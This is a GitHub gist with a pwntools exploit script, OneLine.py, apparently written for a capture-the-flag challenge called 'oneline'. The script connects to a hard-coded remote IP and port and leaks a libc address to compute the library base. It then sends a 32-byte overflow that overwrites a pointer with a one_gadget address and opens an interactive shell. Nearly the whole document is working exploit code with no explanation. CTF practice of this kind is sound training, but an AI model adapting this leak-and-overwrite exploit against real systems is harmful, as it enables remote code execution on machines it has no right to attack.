Skip to content

Instantly share code, notes, and snippets.

@ywkw1717

ywkw1717/OneLine.py

Created May 26, 2019 12:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ywkw1717/929c45e1a20534b59dc81273edb37a3e to your computer and use it in GitHub Desktop.
Save ywkw1717/929c45e1a20534b59dc81273edb37a3e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
OneLine.py
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./oneline")
conn = remote("153.120.129.186", 10000)
libc = ELF("./libc-2.27.so")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]
# first payload
payload = "A" * 4
print conn.recvuntil(">> ")
conn.sendline(payload)
conn.recv(32)
leak_addr = u64(conn.recv(6) + "\x00\x00")
libc_base = leak_addr - libc.symbols["write"]
print hex(leak_addr)
print hex(libc_base)
# second payload
payload = "A" * 32
payload += p64(libc_base + one_gadget[1])
print conn.recvuntil(">> ")
conn.sendline(payload)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment